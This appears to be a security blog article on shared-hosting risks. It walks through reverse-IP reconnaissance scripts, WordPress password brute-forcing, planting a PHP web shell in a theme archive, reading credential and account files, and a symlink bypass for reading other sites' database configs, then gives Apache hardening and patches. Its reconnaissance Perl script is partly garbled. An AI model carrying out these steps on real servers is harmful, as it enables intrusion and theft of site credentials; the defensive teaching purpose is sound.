PREFACE
In this article, I would like to present the risks associated with
hosting your site on a shared hosting server. I often correlate it with
the analogy, “a chain is only as strong as its weakest link”. In a
similar way, if your site is hosted on a shared hosting server, it is
only as secure as the site with the weakest security on the same server.
Web Administrators often face the unfortunate situation where even
after hardening their site, patching all the security loopholes, running
the latest version of the software and plugins, their site is
compromised or defaced.
The intended audience for this article ranges from server
Administrators, Site Administrators to Security Enthusiasts and
Professionals.
INTRODUCTION
While there are many ways of hacking a site, the hackers tend to use the easiest path before going for advanced attacks.
By understanding these methods used by the attackers, it allows us to prevent many possibilities of attack against the server.
From a performance point of view on a shared hosting server, the
server’s resources (processor and memory) are shared with other sites
hosted on the same server. While this may not be a bottleneck for most
of the site owners, there are other risks associated with a shared
hosting server from a security standpoint that can never be overlooked
irrespective of the purpose of your site.
Let us look at some of the reasons your site is not so secure on a shared hosting server:
- If any one site on the server is compromised, it literally opens a
gateway for the attacker to gain access to the other sites hosted on the
same server as well.
- A malicious user can buy the hosting from a shared hosting Provider
and use his site to gain access to other sites on the same server.
- There is also the disadvantage of not being able to harden the
server. If you are on a shared hosting server, you would not have access
to the PHP and Apache configuration of the server.
By exploring the different phases of attack used to compromise a site
and a server thereafter, we can understand the risks associated with
having your site run on a shared hosting server.
The best way to benefit from this article and use it to secure your
site and hosting is by giving a thought about how you can mitigate each
step used by the attacker.
Reverse IP Lookup
This is one of the most important stages of the attack, also known as
Reconnaissance. Since the attacker is targeting a site on a shared
hosting, the most important step becomes to enumerate the list of other
websites running on the same server.
This can be done easily with the help of
Reverse IP lookup.
A reverse IP lookup can help in quick and easy discovery of various other sites running on the same server as your own site.
It can be done in various ways.
-
Using a Free Service to get this List: There are
some sites online that maintain a database that maps an IP Address to
various websites that run on the server with this IP Address.
Please note that the results of these sites may not be accurate and in some cases, they show incorrect results.
http://www.yougetsignal.com/tools/web-sites-on-web-server/
This is a good site to perform a quick reverse IP lookup. It will
even highlight the sites with questionable content in red. Usually,
these are also the sites that lack the security and are often easy
targets for an attacker.
-
Using dig on Linux.
Dig command can be used to perform a reverse IP lookup in this way:
Dig –x <ip address> +short
An example:
c0d3inj3ct@:~/pentest/$ dig -x 74.125.236.51 +short
www.google.com.
This functionality provided by dig command can be extended not to
grab the hostnames associated with all the IP Addresses in a subnet.
Here is a short shell script written which will accept an IP Address
as an argument and then list out all the hostnames associated with the
IP Addresses in that subnet:
#!/bin/bash
NET=$1
for n in $(seq 1 254); do
ADDR=${NET}.${n}
echo -e “${ADDR}\t$(dig -x ${ADDR} +short)”
done
chmod +x subnetscan.sh
./subnetscan.sh <IP Address>
-
Using a Search Engine to get the list.
This is another quick and easy way to get the list of sites running
on the same server. Search Engines like bing.com give very accurate
results.
Search Query: ip: <IP Address>
-
Automating the Reverse IP lookup using a Perl Script.
It can also be automated using Perl by writing a script which will
accept a site name as an argument, and use its IP Address to get the
list of all the sites running on the same server. I will provide the
script later in this article that I have written to perform the Reverse
IP lookup and later discover all the CMS running on the same server.
The Reverse IP Lookup stage is also one of the most interesting
phases since it can really open your eyes when you discover the kind of
sites running on your server. This may also be important for you from an
SEO point of view since if the sites running on your server have a bad
reputation, chances are you would not get a good search rank.
Enumerating CMS running on the server
CMS are content management systems running on the sites that make it
easy for the web administrator to host and manage their content.
CMS seems to be one of the easiest ways to break into a server. So, a
list of sites running a CMS is made. The reason this is so easy to do
is because all CMS software inserts their name and version details in
the HTML Page in Meta tag’s content attribute with the name attribute
set to generator.
Using a passive scan, we can grab the CMS Type and Version number details from the source code of the site.
Examples of Meta tags of some WordPress and Joomla Sites:
<meta name=”generator” content=”WordPress 3.5.1″ />
<meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
As can be seen, it becomes very easy to know the CMS Type and Version number just by looking up the Source code.
Now, we can combine the Reverse IP Lookup with Enumerating the CMS
running on the server. I have written a Perl script that accepts an IP
Address as an argument. It will perform a Reverse IP lookup; generate
the list of all the sites running CMS and the corresponding CMS Type.
Please note that this script can be extended to gather information
for more types of CMS. You just need to inspect the Source Code for
various CMS and see what type of information they insert in the Meta
tags.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
|
#! /usr/bin/perl
use warnings;
use WWW::Mechanize;
use HTML::TreeBuilder::XPath;
use LWP::UserAgent;
use HTTP::Request;
use Crypt ::SSLeay;
use JSON qw{decode_json};
use Net::DNS;
no warnings 'uninitialized' ;
no warnings 'once' ;
print "\n################### CMS Finder #########################\n" ;
print "################## - c0d3inj3cT - ######################\n\n" ;
print "Enter the IP Address of the Serverserver: " ;
$server_ip =;
chomp $server_ip ;
print "Enter the output file name: " ;
$output =;
chomp $output ;
open (OUTPUT, '>>' , $output ) || die ( "Couldn't open the file, $output with error: $!\n" );
$query = "ip:" . $server_ip ;
$account_key = '' ;
$ua = LWP::UserAgent->new;
$page_count = 0;
$interval = 50;
while (1)
{
$skip = $page_count * $interval ;
$url ->query_form(
'Query' => qq{ '$query' },
'$top' => $interval ,
'$skip' => $skip ,
'$format' => 'json' ,
);
last if ( $page_count == 9);
$req = HTTP::Request->new(GET => $url );
$req ->authorization_basic( '' , $account_key );
$res = $ua ->request( $req );
die $res ->status_line if ! $res ->is_success;
$json = decode_json $res ->content;
last if ! defined $json ->{d}->{results};
foreach $result (@{ $json ->{d}->{results}})
{
$domain = $result ->{DisplayUrl};
$domain =~s/(.*?)\/.*/ $1 /;
$check =&resolve( $domain );
if ( $check ==1)
{
push ( @hosts , $domain );
}
}
++ $page_count ;
}
@unique = grep { ! $seen { $_ }++ } @hosts ;
$count = scalar @unique ;
print "\nApproximately " . $count . " hosts found on the server\n\n" ;
$mech =WWW::Mechanize->new();
$mech ->max_redirect(0);
print OUTPUT <<HTML;
CMS Finder!</pre>
HTMLprint "\n\nChecking for CMS Panels on the Sites\n\n" ; foreach $host ( @unique ){ chomp $host ; $url = "http://" . $host ; eval { $mech ->get( $url );}; next if ($@); $response = $mech ->content(); $tree =HTML::TreeBuilder::XPath->new(); $tree ->parse( $response ); @nodes = $tree ->findnodes(q{//meta[ @name =~/generator/}); $c =0; foreach $node ( @nodes ) { $c ++; $name = $node ->attr( 'content' ); if ( $name =~ /Joomla/) { ( $cms , $version , $rest )= split ( " " , $name ,3); print OUTPUT " \n" ; } elsif ( $name =~ /Word/) { ( $cms , $version )= split ( " " , $name ); print OUTPUT " \n" ; push ( @wordpress , $url ); } last if ( $c ==1); }} print OUTPUT "
<table border= "1" cellspacing= "1" align= "center" >
<tbody>
< tr >
<td><b>Site</b></td>
<td><b>CMS</b></td>
<td><b>Version</b></td>
</ tr >
< tr >
<td> ".$url." </td>
<td> ".$cms." </td>
<td> ".$version." </td>
</ tr >
< tr >
<td> ".$url." </td>
<td> ".$cms." </td>
<td> ".$version." </td>
</ tr >
</tbody>
</table>
<pre>";
sub resolve()
{
$site = $_ [0];
$resolver = Net::DNS::Resolver->new();
$queryresponse = $resolver -> send ( $site , "A" );
@rr = grep { $_ ->type eq "A" } $queryresponse ->answer;
$num = scalar @rr ;
if ( $num == 0){ return ;}
$ip = $rr [0]->address;
if ( $ip eq $server_ip )
{
return 1;
}
else
{
return 0;
}
}
sub countlines()
{
$lines =0;
open (PLUGINS, '<' , 'plugins.txt' ) || die ( "couldn't read from the file with error: $!\n" );
$lines ++ while ();
return $lines ;
}
|
Attacking the CMS
After the list of sites is generated, now specific sub lists can be created based on the type of CMS.
- All the sites running WordPress.
- All the sites running Joomla.
The Perl Script above can be extended to grab information about other commonly used CMS as well.
This is the next step that is similar to information gathering phase.
There are well-known vulnerability scanners for the CMS, WordPress and
Joomla available.
Besides this, the exploit archives on sites, such as
exploit-db.com, can also be used as a reference to look up the exploit corresponding to the CMS version.
I will provide here few examples of how a vulnerability scanner for
the WordPress CMS can be used to gather more details for compromising
it.
A vulnerability scanner such as WPScan, which is developed in Ruby
and comes by default with Backtrack, can be used to perform a quick
information gathering scan of the WordPress Site.
- List the plugins running on the WordPress
- List the themes running on the site.
- Display any TimThumbs found on the site.
- Enumerate all the usernames found.
In the screenshot below, you can see various attack vectors gathered using WPScan:

One of the most common ways used by attackers to break into CMS Admin
Panels is by bruteforcing. The fact that many administrators do not use
strong passwords is exploited.
An example attack would be to bruteforce the admin account of
WordPress using a list of commonly used passwords. If the WordPress
Login Page lacks a captcha protection, it can easily be bruteforced
using WPScan itself.
Below screenshot is an example where the WordPress Admin Password was
cracked successfully using WPScan and a list of commonly used
passwords.

As can be seen, the password for the admin account was cracked
successfully. Based on the strength of your wordlist there is a high
probability that the passwords of wordpress admin accounts will be
cracked successfully.
Upload your shell to the server
One of the most common ways of uploading a shell to the server is
through the Admin Panel. Most CMS offer a lot of functionality to the
administrator through the Admin Panel. Functionalities such as
installing a new theme, a new plugin, editing the source files used by
the themes and the plugins are very powerful features.
How can an attacker exploit this?
If we again consider the example of WordPress CMS, then below are
some of the ways an attacker can upload the shell to WordPress:
-
Upload a new theme to the WordPress Site. In the theme.zip file,
the malicious PHP shell can be inserted and uploaded. WordPress has a
feature that allows you to install a theme automatically by browsing for
an archive file containing the files specific for a theme.
The screenshot below shows how a malicious theme can be uploaded by an attacker to the WordPress CMS.

The attacker browses to the location inside Admin Panel where the
option to upload a new Theme is provided. In our case, we are uploading a
theme called “buttercream” present in the archive file: buttercream.zip
This archive file contains all the necessary files for this theme. We
have inserted a malicious PHP shell in this archive called az.php.
The screenshot shows a code snippet of the az.php shell.
Once you install this theme successfully on the victim’s wordpress
site, you can access the shell from the Browser by going to the
location:
http://victimsite.com/wp-content/themes/buttercream/az.php
- It can also be done by manually inserting the PHP Shell code in the
existing files of WordPress themes and plugins. They will be executed
manually by the site when the page loads.
Now that we have uploaded a shell, we can execute Linux commands on the Web server.
Let us first try to gather some more details about the server and the current access that we have.
We are unable to read other sites’ home directories right now because we do not have root access.
Common Linux Commands used in PHP Shells
PHP Shells often make use of functions like system(), shell_exec(), exec() and similar other functions to execute system code.
If these functions are not disabled in the PHP Installation of the
server, then attacker can easily run any Linux commands they wish.
We will quickly look at some of the commands useful to an attacker.
This is more than just a reference of the commands. It helps us
understand what specific information an attacker looks for after
uploading a shell.
uname –a
Linux studio4 2.6.18-274.12.1.el5 #1 SMP Tue Nov 29 13:37:46 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
The most important information we get from this is the version of Linux Kernel: 2.6.18-274.12.1.el5
It will be useful for us to root the server by exploiting this version of Linux Kernel.
Id
This command will show the current user’s UID and GID corresponding
to the entry for this user in /etc/passwd file of the Linux server.
It is important to note that the PHP Shell, which you have uploaded
to the server, and the commands being executed are all under the context
of this user. So, all the access restrictions in place for this user
are applied to you as well.
uid=48(apache) gid=48(apache) groups=48(apache)
This means that our shell is running in the context of the user, “apache” with a UID of 48 and GID of 48.
Cat /etc/passwd
/etc/passwd is world readable. So, even without root access, we are
able to read the contents of this file. This is important for an
attacker to know the various other users existing on the current server
along with their home directory locations.
Example output:
bruce:x:502:502::/home/bruce:/bin/bash
Usually on a shared hosting server, every site runs under a different
user account. Each user has their own home directory. All the files
corresponding to their site will be stored under their home directory.
The main objective of the attacker is to gain access (read only at the very least) to these files.
/etc/valiases
This file will store a mapping between the name of all the sites
running on the server and their corresponding user accounts in the
/etc/passwd file.
Why is this information important to the attacker?
Let us take the previous example one step further to understand it better.
Consider that the user “
bruce” has a site called
http://bruceparadise.com running on this shared hosting server.
The attacker may know that there is a site called
bruceparadise.com running on the same server because of the information gathered from Reverse IP Lookup.
However, he may not know the user account under which this site is running.
Let us assume that he was unable to find any
Full Path Disclosure on the site, so he is unaware of the home directory of the website.
In such cases, /etc/valiases file can be very useful.
By running a command like this:
Ls /etc/valiases/bruceparadise.com
It will tell us the corresponding username under which this site is running.
-rw-r—– 1 bruce Mar 9 16:14 /etc/valiases/bruceparadise.com
Using the corresponding entry for bruce in /etc/passwd, we now know that the home directory for the site, bruceparadise.com is:
/home/bruce/public_html
Cat /etc/named.conf
Named.conf contains a list of zones and the path to the files used by named to control these domains.
The most important information from this file is the site names.
Combine it with /etc/valiases and /etc/passwd and you have a clean list
of all the sites on the server along with each sites’ Home Directory.
A short snippet from a server’s named.conf file is given below:
A Real Time Scenario
Bruceparadise.com provides an option for the users to register to
view the content. All the details of the users are stored in the backend
database.
Each time a user logs in; their credentials have to be verified
against the information present in the database. In order to do this,
the site needs to establish a connection to the database.
Usually these details are present in files like config.php, settings.php and so on.
Again, we can gather this information by understanding the type of
software used by the site and then looking up the source code from
repositories.
In our case,
http://bruceparadise.com/includes/config.php
The attacker wants to read the config.php details to get the sensitive information for connecting to the MySQL Database.
Full Path to the file:
/home/bruce/public_html/includes/config.php
Here comes the interesting part, if we try running the following command to view the file contents:
Cat /home/bruce/public_html/includes/config.php
It will not display the output.
The reason for this is that we are trying to read the contents of
another user’s home directory under the context of Current User.
Now, we look at one of the most common ways used by attackers to gain read only access to all the sites on the server.
Bypass Server Protection using Symlink
Most of the servers will not allow you to view the home directories of other users on the server.
A symlink is established by the attacker on the server. Using this
symlink, he can now view the home directories of any other user on the
server.
Apache Web servers allow few options to disable/enable the access to the user to follow the symlinks.
The Apache option of interest to an attacker is
FollowSymlinks. As opposed to
SymlinksIfOwnerMatch option, this option does not check for the file ownership when a request to read the file is made from another user account.
These options can be configured in two places:
-
Apache Web server’s httpd.conf file: The options can be disabled in
the Apache Web server’s configuration file. It can also be specified
whether these options can be overridden by directory specific .htaccess
files or not.
Below sample configuration from httpd.conf will disable the use of FollowSymlinks in the server and at the same time disallow this option to be re-enabled in .htaccess files.
1
2
3
4
|
<Directory "/home">
Options +All -FollowSymLinks +IncludesNOEXEC -Indexes +MultiViews +SymLinksIfOwnerMatch
AllowOverride All Options=ExecCGI,Includes,IncludesNOEXEC,Indexes,MultiViews,SymLinksIfOwnerMatch
</Directory>
|
As specified in the list of options above, only those Options can be
overridden by directory specific .htaccess files. FollowSymLinks has
been disabled explicitly.
-
Directory specific .htaccess files: If the Web server allows you to
override FollowSymlinks directive, then the attacker can manually
enable FollowSymLinks option in the directory to which he has write
access.
A simple way to do this:
- Mkdir lnk – create a directory called lnk in the current directory.
-
Create a .htaccess file in the lnk directory with the following contents:
Options +FollowSymLinks
-
Establish the symlink to config.php (in the example above) as shown below:
Ln –s /home/bruce/public_html/includes/config.php /home/victim/public_html/lnk/00.txt
This command will establish a symlink from 00.txt to config.php of bruce user’s directory.
We can easily view the configuration by doing:
Cat 00.txt
A few misconceptions about Symlinks
A few web administrators feel that performing the following functions will prevent the attacker from creating a symlink:
- Disable the symlink() function in PHP.ini’s disable_function setting.
- Disable the use of /bin/ln by a non-root user to create a symlink.
Why these measures will fail to secure your server?
It is because symlinks is a functionality provided by the Linux
Kernel. /bin/ln provides you a way to perform the symlink. However, this
same functionality can be programmed with any Interpreted language like
Perl, Python or Ruby.
An attacker can run these scripts to establish the symlink as well.
Solutions for Protecting from Symlink Attacks
In the past few years, a lot of servers and sites running on the
servers have been compromised because of Symlink Bypass on the Apache
server. This was mainly due to the reason that attackers were allowed to
override the Symlink setting in .htaccess files.
Several solutions have been provided for this problem either in the
form of a patch that needs to be applied to the Apache Web server or a
setting that needs to be enabled in your Web Hosting Manager.
Some patches of interest:
-
Rack911 Patch: It makes a change at the Apache
code level (in httpd) and modifies the way Apache Web server uses the
FollowSymlinks option. It is automatically translated to
SymlinksIfOwnerMatch.
http://layer1.rack911.com/harden-symlinks.patch
It is still vulnerable to the Race Condition in Symlinks.
-
Bluehost patch: A better solution, which fixes the race condition issue as well.
http://mail-archives.apache.org/mod_mbox/httpd-dev/201210.mbox/raw/%3c5090AD37.1070303@bluehost.com%3e/2
Bad Neighbor on a shared hosting server
At times, when the attackers are unable to find any vulnerability on
the sites or the server, if they are really determined to hack the
server, they can purchase hosting from the server.
Based on the kind of sites hosted on the server, if they are of
financial interest to the Hacker, then spending a few dollars to
purchase hosting is worth it for them.
Once a hosting account is created for them, they can perform the same
steps as mentioned above to gain access to the complete server. Since,
they already control one Site on the server; it makes it very easy to
proceed with the attack.
Conclusion
After reading and understanding the common methods used by Hackers to
attack shared hosting servers and compromise the sites, it should help
you in protecting yourself better.
If you are a Security Professional or a Security Enthusiast and own a
site on a shared hosting server, you can perform a small audit on the
server to see if it is indeed vulnerable and allows you to read files of
other sites on the same server. If it is, you can inform the Hosting
Provider about this and help them harden the server before a malicious
Attacker takes control of it.
References
http://httpd.apache.org/docs/2.2/mod/core.html
http://whmscripts.net/misc/2013/apache-symlink-security-issue-fixpatch/
About the Author

c0d3inj3cT
is an Information Security Professional and has a strong interest in
various areas of Information Security ranging from Reverse Engineering,
Cryptography, Malware Analysis, latest online threats to Web Application
Security, Password Security. His other interests include working in
GPGPU related tasks like Cryptographic Hashing Algorithm Cracking and
Crypto Currencies.